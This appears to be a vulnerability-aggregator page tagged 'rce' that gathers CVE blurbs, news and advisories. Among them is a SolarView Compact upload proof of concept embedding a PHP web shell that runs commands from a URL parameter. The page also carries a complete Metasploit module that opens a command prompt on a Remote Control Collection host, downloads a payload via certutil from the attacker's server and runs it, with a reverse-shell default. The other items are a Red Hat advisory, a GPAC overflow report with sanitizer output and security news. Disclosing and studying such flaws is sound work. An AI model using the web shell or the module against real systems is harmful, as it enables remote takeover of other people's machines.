SolarView Compact 4.0 and 5.0 is vulnerable to Unrestricted File Upload via a crafted php file.

Permalink

Cannot retrieve contributors at this time

**Unrestricted File Upload vulnerability in SolarView Compact 4.0,5.0****Description**

Unrestricted File Upload vulnerability in SolarView Compact 4.0,5.0 at /Solar\_Image.php can allow attackers to get a Remote Code Execution on the vulnerable host via upload crafted php file.

**POC**

1.  navigate to /Solar\_Image.php
2.  upload any php file and caputre the request
3.  update the userfile and upfilename parameters like this:

    -----------------------------168287165333758025211172961484
    Content-Disposition: form-data; name="userfile"; filename="shell.php"
    Content-Type: application/octet-stream
    
    <?php echo "Shell";system($_GET['cmd']); ?>
    -----------------------------168287165333758025211172961484
    Content-Disposition: form-data; name="upfilename"
    
    shell.php
    -----------------------------168287165333758025211172961484
    

4.  send the request and navigate to /images/background/shell.php?cmd=ls

CVE-2022-44354: Vulns/Unrestricted File Upload_ SolarView Compact 4.0,5.0.md at main · strik3r0x1/Vulns

Security researcher scores $10K bug bounty

John Leyden 29 November 2022 at 16:30 UTC

Security researcher scores $10K bug bounty

A security researcher has released details of how they were able to hack Intel’s Data Center Manager (DCM).

More specifically, Julien Ahrens of RCE Security succeeded in bypassing Intel DCM’s authentication by spoofing Kerberos and LDAP (Lightweight Directory Access Protocol) responses, creating an exploit chain that they claim yielded remote code execution (RCE) in the process.

Intel acknowledges that Ahrens uncovered a vulnerability – tracked as CVE-2022-33942 and assessed with a severity score of 8.8 – but disputes its seriousness. According to Intel, the issue represents only a privilege elevation flaw rather an RCE risk.

“A protection mechanism failure in the Intel DCM software before version 5.0 may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access,” a summary by Mitre Corp explained.

Despite the contended vulnerability disclosure process, Ahrens argued successfully enough for Intel to make a one-time exception and reward the researcher with a $10,000 bug bounty – much more than it would normally pay out for this class of security problem.

Catch up with the latest enterprise security news

Intel’s Data Centre Manager Console offers a real-time monitoring and management dashboard that can be used to manage an array of data center assets. Ahrens uncovered vulnerabilities in the product through a source code review of the decompiled application.

Some aspects of the painstaking work that followed and its results may be relevant to other security researchers and technology developers.

“It was the first time I discovered this kind of vulnerability, mainly because I barely looked at Active Directory-integrated software,” Ahrens told The Daily Swig.

“However, it might be the case that other vendors suffer from the same type of vulnerability if they don’t validate the user-defined authentication domain (which, however, should be done since it’s part of the overall authentication schema).”

**Technical write-up and sequel**

The researcher has published the main aspects of his findings in a detailed technical blog post that recounts the main aspects of the story. A second blog post is due out later this week.

The freelance penetration tester and security researcher added: “This specific bug also always depends on a configured Active Directory group with a well-known SID \[security identifier\] – so it does not apply to Active Directory implementations, per se.

“You could theoretically also exploit this using single user or custom group objects that don’t have a well-known SIDs, but that would require the attacker to either be able to guess, predict, or leak it somehow else.”

According to Ahrens. Intel resolved the vulnerability by enforcing LDAP-based \[controls\] and performing an additional certificate check against DCM’s internal SSL keystore, where the Active Directory CA certificate needs to be trusted.

In response to queries from The Daily Swig, Intel said it had issued a public security advisory for the issue as part of its usual process. “It’s resolved via an update to Intel® DCM software version 5.0 or later,” an Intel spokesperson added.

YOU MAY ALSO LIKE Zendesk Explore flaws opened the doors to account pillage

Intel disputes seriousness of Data Centre Manager authentication flaw

This Metasploit module utilizes the Remote Control Server's protocol to deploy a payload and run it from the server. Remote Control Collection by Steppschuh version 3.1.1.12 was tested and affected at the time of the module writing.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = NormalRanking  prepend Msf::Exploit::Remote::AutoCheck  include Exploit::Remote::Udp  include Exploit::EXE # generate_payload_exe  include Msf::Exploit::Remote::HttpServer::HTML  include Msf::Exploit::FileDropper  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Remote Control Collection RCE',        'Description' => %q{          This module utilizes the Remote Control Server's, part          of the Remote Control Collection by Steppschuh, protocol          to deploy a payload and run it from the server.  This module will only deploy          a payload if the server is set without a password (default).          Tested against 3.1.1.12, current at the time of module writing        },        'License' => MSF_LICENSE,        'Author' => [          'h00die', # msf module          'H4rk3nz0' # edb, discovery        ],        'References' => [          [ 'URL', 'http://remote-control-collection.com' ],          [ 'URL', 'https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/remote%20control%20collection/remote-control-collection-rce.py' ]        ],        'Arch' => [ ARCH_X64, ARCH_X86 ],        'Platform' => 'win',        'Stance' => Msf::Exploit::Stance::Aggressive,        'Targets' => [          ['default', {}],        ],        'DefaultOptions' => {          'PAYLOAD' => 'windows/shell/reverse_tcp',          'WfsDelay' => 5,          'Autocheck' => false        },        'DisclosureDate' => '2022-09-20',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS]        }      )    )    register_options(      [        OptPort.new('RPORT', [true, 'Port Remote Mouse runs on', 1926]),        OptInt.new('SLEEP', [true, 'How long to sleep between commands', 1]),        OptString.new('PATH', [true, 'Where to stage payload for pull method', '%temp%\\']),        OptString.new('CLIENTNAME', [false, 'Name of client, this shows up in the logs', '']),      ]    )  end  def path    return datastore['PATH'] if datastore['PATH'].end_with? '\\'    "#{datastore['PATH']}\\"  end  def special_key_header    "\x7f\x15\x02"  end  def key_header    "\x7f\x15\x01"  end  def windows_key    udp_sock.put("#{special_key_header}\x01\x00\x00\x00\xab") # key up    udp_sock.put("#{special_key_header}\x00\x00\x00\x00\xab") # key down    sleep(datastore['SLEEP'])  end  def enter_key    udp_sock.put("#{special_key_header}\x01\x00\x00\x00\x42")    sleep(datastore['SLEEP'])  end  def send_command(command)    command.each_char do |c|      udp_sock.put("#{key_header}#{c}")      sleep(datastore['SLEEP'] / 10)    end    enter_key    sleep(datastore['SLEEP'])  end  def check    @check_run = true    @check_success = false    upload_file    return Exploit::CheckCode::Vulnerable if @check_success    return Exploit::CheckCode::Safe  end  def on_request_uri(cli, _req)    @check_success = true    if @check_run # send a random file      p = Rex::Text.rand_text_alphanumeric(rand(8..17))    else      p = generate_payload_exe    end    send_response(cli, p)    print_good("Request received, sending #{p.length} bytes")  end  def upload_file    connect_udp    # send a space character to skip any screensaver    udp_sock.put("#{key_header} ")    print_status('Connecting and Sending Windows key')    windows_key    print_status('Opening command prompt')    send_command('cmd.exe')    filename = Rex::Text.rand_text_alphanumeric(rand(8..17))    filename << '.exe' unless @check_run    if @service_started.nil?      print_status('Starting up our web service...')      start_service('Path' => '/')      @service_started = true    end    get_file = "certutil.exe -urlcache -f http://#{srvhost_addr}:#{srvport}/ #{path}#{filename}"    send_command(get_file)    if @check_run.nil? || @check_run == true      send_command("del #{path}#{filename} && exit")    else      register_file_for_cleanup("#{path}#{filename}")      print_status('Executing payload')      send_command("#{path}#{filename} && exit")    end    disconnect_udp  end  def exploit    @check_run = false    upload_file  endend

Remote Control Collection Remote Code Execution

Red Hat Security Advisory 2022-8652-01 - This release of Red Hat Fuse 7.11.1 serves as a replacement for Red Hat Fuse 7.11 and includes bug fixes and enhancements, which are documented in the Release Notes document linked in the References. Issues addressed include bypass, cross site scripting, denial of service, remote SQL injection, and traversal vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: Red Hat Fuse 7.11.1 release and security update  
Advisory ID:       RHSA-2022:8652-01  
Product:           Red Hat JBoss Fuse  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8652  
Issue date:        2022-11-28  
CVE Names:         CVE-2019-8331 CVE-2021-3717 CVE-2021-31684  
                   CVE-2021-44906 CVE-2022-0613 CVE-2022-2048  
                   CVE-2022-2053 CVE-2022-24723 CVE-2022-24785  
                   CVE-2022-24823 CVE-2022-25857 CVE-2022-31129  
                   CVE-2022-31197 CVE-2022-33980 CVE-2022-38749  
                   CVE-2022-41853 CVE-2022-42889  
====================================================================  
1. Summary:

A minor version update (from 7.11 to 7.11.1) is now available for Red Hat  
Fuse. The purpose of this text-only errata is to inform you about the  
security issues fixed in this release.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

This release of Red Hat Fuse 7.11.1 serves as a replacement for Red Hat  
Fuse 7.11 and includes bug fixes and enhancements, which are documented in  
the Release Notes document linked in the References.

Security Fix(es):

* hsqldb: Untrusted input may lead to RCE attack [fuse-7] (CVE-2022-41853)

* io.hawt-hawtio-online: bootstrap: XSS in the tooltip or popover  
data-template attribute [fuse-7] (CVE-2019-8331)

* io.hawt-project: bootstrap: XSS in the tooltip or popover data-template  
attribute [fuse-7] (CVE-2019-8331)

* wildfly: incorrect JBOSS_LOCAL_USER challenge location may lead to giving  
access to all the local users [fuse-7] (CVE-2021-3717)

* json-smart: Denial of Service in JSONParserByteArray function [fuse-7]  
(CVE-2021-31684)

* io.hawt-hawtio-integration: minimist: prototype pollution [fuse-7]  
(CVE-2021-44906)

* urijs: Authorization Bypass Through User-Controlled Key [fuse-7]  
(CVE-2022-0613)

* http2-server: Invalid HTTP/2 requests cause DoS [fuse-7] (CVE-2022-2048)

* snakeyaml: Denial of Service due to missing nested depth limitation for  
collections [fuse-7] (CVE-2022-25857)

* urijs: Leading white space bypasses protocol validation [fuse-7]  
(CVE-2022-24723)

* Moment.js: Path traversal in moment.locale [fuse-7] (CVE-2022-24785)

* netty: world readable temporary file containing sensitive data [fuse-7]  
(CVE-2022-24823)

* jdbc-postgresql: postgresql: SQL Injection in ResultSet.refreshRow() with  
malicious column names [fuse-7] (CVE-2022-31197)

* commons-configuration2: apache-commons-configuration: Apache Commons  
Configuration insecure interpolation defaults [fuse-7] (CVE-2022-33980)

* commons-text: apache-commons-text: variable interpolation RCE [fuse-7]  
(CVE-2022-42889)

* undertow: Large AJP request may cause DoS [fuse-7] (CVE-2022-2053)

* moment: inefficient parsing algorithm resulting in DoS [fuse-7]  
(CVE-2022-31129)

* snakeyaml: Uncaught exception in  
org.yaml.snakeyaml.composer.Composer.composeSequenceNode [fuse-7]  
(CVE-2022-38749)

For more details about the security issues, including the impact, CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

Before applying the update, back up your existing installation, including  
all applications, configuration files, databases and database settings, and  
so on.

Installation instructions are available from the Fuse 7.11.1 product  
documentation page:  
https://access.redhat.com/documentation/en-us/red_hat_fuse/7.11/

4. Bugs fixed (https://bugzilla.redhat.com/):

1686454 - CVE-2019-8331 bootstrap: XSS in the tooltip or popover data-template attribute  
1991305 - CVE-2021-3717 wildfly: incorrect JBOSS_LOCAL_USER challenge location may lead to giving access to all the local users  
2055496 - CVE-2022-0613 urijs: Authorization Bypass Through User-Controlled Key  
2062370 - CVE-2022-24723 urijs: Leading white space bypasses protocol validation  
2066009 - CVE-2021-44906 minimist: prototype pollution  
2072009 - CVE-2022-24785 Moment.js: Path traversal  in moment.locale  
2087186 - CVE-2022-24823 netty: world readable temporary file containing sensitive data  
2095862 - CVE-2022-2053 undertow: Large AJP request may cause DoS  
2102695 - CVE-2021-31684 json-smart: Denial of Service in JSONParserByteArray function  
2105067 - CVE-2022-33980 apache-commons-configuration: Apache Commons Configuration insecure interpolation defaults  
2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS  
2116952 - CVE-2022-2048 http2-server: Invalid HTTP/2 requests cause DoS  
2126789 - CVE-2022-25857 snakeyaml: Denial of Service due to missing nested depth limitation for collections  
2129428 - CVE-2022-31197 postgresql: SQL Injection in ResultSet.refreshRow() with malicious column names  
2129706 - CVE-2022-38749 snakeyaml: Uncaught exception in org.yaml.snakeyaml.composer.Composer.composeSequenceNode  
2135435 - CVE-2022-42889 apache-commons-text: variable interpolation RCE  
2136141 - CVE-2022-41853 hsqldb: Untrusted input may lead to RCE attack

5. References:

https://access.redhat.com/security/cve/CVE-2019-8331  
https://access.redhat.com/security/cve/CVE-2021-3717  
https://access.redhat.com/security/cve/CVE-2021-31684  
https://access.redhat.com/security/cve/CVE-2021-44906  
https://access.redhat.com/security/cve/CVE-2022-0613  
https://access.redhat.com/security/cve/CVE-2022-2048  
https://access.redhat.com/security/cve/CVE-2022-2053  
https://access.redhat.com/security/cve/CVE-2022-24723  
https://access.redhat.com/security/cve/CVE-2022-24785  
https://access.redhat.com/security/cve/CVE-2022-24823  
https://access.redhat.com/security/cve/CVE-2022-25857  
https://access.redhat.com/security/cve/CVE-2022-31129  
https://access.redhat.com/security/cve/CVE-2022-31197  
https://access.redhat.com/security/cve/CVE-2022-33980  
https://access.redhat.com/security/cve/CVE-2022-38749  
https://access.redhat.com/security/cve/CVE-2022-41853  
https://access.redhat.com/security/cve/CVE-2022-42889  
https://access.redhat.com/security/updates/classification/#important

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY4UEJdzjgjWX9erEAQg9jw//bHEzcxXGN9kNp1msJRaz6iQEu7dv9TYV  
N1lsrfJEc/fosdjIilTzia9hKhMVvbC6iv6lWGc6s3E9t48vGdSYLHbh+qHnFo7t  
WtrjZnejl53WYwRc70oyeUmXTNrrd9iuATkvkFF6MA024hcJFksuiHmF5/Awa9T8  
sSsLbm5eutvBz1rBDGgcq4fDCFB40YmKsLKhzHrV0SpeZKTCgwNyzvpAVVlsxXhk  
OSSCmda+ZTxkA9+gaTsJqqeBeDgHhSL+PVzWOYuRM6wT49tkwSJHfBs9EgV55IjE  
IVOQm3oGUyMSGBjbbiD8NuYEQkAip8AK0eTIQbaWW4n9geXpw5VOh/E3U8u+a9xY  
h0pAs6ACta+fD3d9hSabTkDDno6NU94bcmKh2rfpNvj6h9UX0Ca0lKMZ25t6zUln  
2OHzLhilUnbOSwnE709NBaEaI4t/aev1TBpeZ1KFpn/6Mdbx6pvjuh76kCHwdg7o  
OVsrvplG6hJ93S5vNNYxwfcL7TFNyWBcHR0Em7D51zZ87HkzYcNh9Ay481BgXGz+  
z2N71zc+h0auaMo5bnL68hMSjFmhiMWZmfy1H8w2Sz6fol8iO/aYI/ddv/8aYP1k  
3ZMY7ygpkvcryPaz7VKixbX7yZNOI2gfXl2zDSvIoOjaajND4ctdidxJ9MeZYj6r  
WzRyyCDzfVo=IsTh  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8652-01

Apache Fineract allowed an authenticated user to perform remote code execution due to a path traversal vulnerability in a file upload component of Apache Fineract, allowing an attacker to run remote code. This issue affects Apache Fineract version 1.8.0 and prior versions. We recommend users to upgrade to 1.8.1.

**Email display mode:**

Modern rendering  
Legacy rendering

CVE-2022-44635

Data Integrity Failure in 'Backup Config' in D-Link DNR-322L <= 2.60B15 allows an authenticated attacker to execute OS level commands on the device.

Skip to content

GitLab

*   *   GitLab: the DevOps platform
    *   Explore GitLab
    *   Install GitLab
    *   How GitLab compares
    *   Get started
    *   GitLab docs
    *   GitLab Learn
    
*   Pricing
*   Talk to an expert

*   /
    
*   

*   Help
    
    *   Help
    *   Support
    *   Community forum
    
    *   Submit feedback
    *   Contribute to GitLab
    *   Switch to GitLab Next
    
*   *   
    
    Projects Groups Snippets
    
*   Sign up now
*   Login
*   Sign in / Register
    

*   luka
*   CVE-2022-40799

C

**CVE-2022-40799**

Project ID: 39762712

Star 0

*   **2** Commits
*   **1** Branch
*   **0** Tags
*   **195 KB** Project Storage
    

Topics: CVE

D-Link DNR-322L - Authenticated Remote Code Execution

Switch branch/tag

Find file

**Download source code**

zip tar.gz tar.bz2 tar

Clone

*   Clone with SSH
*   Clone with HTTPS

*   Open in your IDE
    
    Visual Studio Code (SSH)
    
    Visual Studio Code (HTTPS)
    
    IntelliJ IDEA (SSH)
    
    IntelliJ IDEA (HTTPS)
    

*   **Copy SSH clone URL**git@gitlab.com:lu-ka/cve-2022-40799.git
*   **Copy HTTPS clone URL**https://gitlab.com/lu-ka/cve-2022-40799.git

*   README
*   MIT License

CVE-2022-40799: luka / CVE-2022-40799 · GitLab

GPAC v2.1-DEV-rev428-gcb8ae46c8-master was discovered to contain a stack overflow via the function dimC_box_read at isomedia/box_code_3gpp.c.

···  
/MP4Box -version  
MP4Box - GPAC version 2.1-DEV-rev428-gcb8ae46c8-master  
(c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io

GPAC Configuration: --enable-sanitizer  
Features: GPAC\_CONFIG\_LINUX GPAC\_64\_BITS GPAC\_HAS\_IPV6 GPAC\_HAS\_SOCK\_UN GPAC\_MINIMAL\_ODF GPAC\_HAS\_QJS GPAC\_HAS\_LINUX\_DVB  
···

    [AV1] Error parsing tile group, tile 0 start 58 + size 17220 exceeds OBU length 3
    [AV1] Frame parsing did not consume the right number of bytes !
    [AV1] could not parse AV1 OBU at position 42. Leaving parsing.
    [ISOBMFF] AV1ConfigurationBox overflow read 17 bytes, of box size 16.
    [iso file] Box "av1C" size 24 (start 20) invalid (read 25)
    =================================================================
    ==22786==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fff0c1f8a40 at pc 0x7f7bb77cb3ad bp 0x7fff0c1f85d0 sp 0x7fff0c1f7d78
    READ of size 1031 at 0x7fff0c1f8a40 thread T0
        #0 0x7f7bb77cb3ac in __interceptor_strdup ../../../../src/libsanitizer/asan/asan_interceptors.cc:443
        #1 0x7f7bb43ee2dd in dimC_box_read isomedia/box_code_3gpp.c:1070
        #2 0x7f7bb44aca33 in gf_isom_box_read isomedia/box_funcs.c:1866
        #3 0x7f7bb44aca33 in gf_isom_box_parse_ex isomedia/box_funcs.c:271
        #4 0x7f7bb44ade85 in gf_isom_parse_root_box isomedia/box_funcs.c:38
        #5 0x7f7bb44d6efc in gf_isom_parse_movie_boxes_internal isomedia/isom_intern.c:378
        #6 0x7f7bb44dd111 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:868
        #7 0x7f7bb44dd111 in gf_isom_open_file isomedia/isom_intern.c:988
        #8 0x55829fb43139 in mp4box_main /home/fuzz/gpac/applications/mp4box/mp4box.c:6211
        #9 0x7f7bb1a59082 in __libc_start_main ../csu/libc-start.c:308
        #10 0x55829fb1ecbd in _start (/home/fuzz/gpac/bin/gcc/MP4Box+0xa3cbd)
    
    Address 0x7fff0c1f8a40 is located in stack of thread T0 at offset 1056 in frame
        #0 0x7f7bb43edeff in dimC_box_read isomedia/box_code_3gpp.c:1048
    
      This frame has 1 object(s):
        [32, 1056) 'str' (line 1049) <== Memory access at offset 1056 overflows this variable
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow ../../../../src/libsanitizer/asan/asan_interceptors.cc:443 in __interceptor_strdup
    Shadow bytes around the buggy address:
      0x1000618370f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100061837100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100061837110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100061837120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100061837130: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x100061837140: 00 00 00 00 00 00 00 00[f3]f3 f3 f3 f3 f3 f3 f3
      0x100061837150: f3 f3 f3 f3 f3 f3 f3 f3 00 00 00 00 00 00 00 00
      0x100061837160: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100061837170: f1 f1 f1 f1 f1 f1 f8 f2 00 f2 f2 f2 00 00 f3 f3
      0x100061837180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100061837190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==22786==ABORTING
    

This is capable of causing crashes and allowing modification of stack memory which could lead to remote code execution.

    GF_Err dimC_box_read(GF_Box *s, GF_BitStream *bs)
    {
    	char str[1024];
    	u32 i;
    	GF_DIMSSceneConfigBox *p = (GF_DIMSSceneConfigBox *)s;
    
    	ISOM_DECREASE_SIZE(p, 3);
    	p->profile = gf_bs_read_u8(bs);
    	p->level = gf_bs_read_u8(bs);
    	p->pathComponents = gf_bs_read_int(bs, 4);
    	p->fullRequestHost = gf_bs_read_int(bs, 1);
    	p->streamType = gf_bs_read_int(bs, 1);
    	p->containsRedundant = gf_bs_read_int(bs, 2);
    
    	i=0;
    	str[0]=0;
    	while (i < GF_ARRAY_LENGTH(str)) {
    		str[i] = gf_bs_read_u8(bs);
    		if (!str[i]) break;
    		i++;
    	}
    	ISOM_DECREASE_SIZE(p, i);
    
    	**p->textEncoding = gf_strdup(str);**           //line:1070   this issue
    
    	i=0;
    	str[0]=0;
    	while (i < GF_ARRAY_LENGTH(str)) {
    		str[i] = gf_bs_read_u8(bs);
    		if (!str[i]) break;
    		i++;
    	}
    	ISOM_DECREASE_SIZE(p, i);
    
    	p->contentEncoding = gf_strdup(str);                          //line:1081   issue 2294 related
    	return GF_OK;
    }

CVE-2022-45202: Stack buffer overflow in function dimC_box_read at isomedia/box_code_3gpp.c:1070 · Issue #2296 · gpac/gpac

Russound XSourcePlayer 777D v06.08.03 was discovered to contain a remote code execution vulnerability via the scriptRunner.cgi component.

Remote Command Execution | Russound XSourcePlayer-777D

**CVE ID:** CVE-2022-44038

**CVE Author:** Momen Eldawakhly (Cyber Guy)

**Description:**

Russound XSourcePlayer 777D v06.08.03 was discovered to contain a remote code execution vulnerability via the scriptRunner.cgi component.

**PoC Image:**

Previous

CVE-2022-44039

Next

CVE-2022-43326

Last modified 3d ago

CVE-2022-44038: CVE-2022-44038

More than 1,000 systems are exposed to a campaign hunting weak Windows servers and more.

The "Bleed You" campaign is trying to take advantage of a known remote code execution (RCE) vulnerability in Windows Internet Key Exchange (IKE) Protocol Extensions, and more than 1,000 systems are unpatched and vulnerable to compromise. 

The critical flaw, tracked as CVE-2022-34721, has been under active attack since September, a new report from Cyfirma warns, affecting vulnerable Windows OS, Windows Servers, along with Windows protocol and services. Once they achieve compromise the threat actors move laterally to deploy ransomware and other malware, the team observed.

The threat actors speak Mandarin but also have ties to the Russian cybercriminals, according to Cyfirma, which adds that the attacks aren't limited to a specific sector with targets across retail, government, IT services, and more. Victims likewise were spread across a number of mostly Western countries, including Canada, the UK, and the US. 

"Attackers are actively exploiting vulnerable Windows Server machines via the IKE and AuthIP IPsec Keying Modules by exporting this bug. Users are recommended to apply patches and fixes as soon as possible to reduce the severity of exploitation of the vulnerability," Cyfirma's researchers advised. "The researchers observed that unknown hackers are sharing the exploit link on the underground forums as well." 

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Cyber-Threat Group Targets Critical RCE Vulnerability in 'Bleed You' Campaign

The Theme and plugin translation for Polylang is vulnerable to authorization bypass in versions up to, and including, 3.2.16 due to missing capability checks in the process_polylang_theme_translation_wp_loaded() function. This makes it possible for unauthenticated attackers to update plugin and theme translation settings and to import translation strings.

Tag

#rce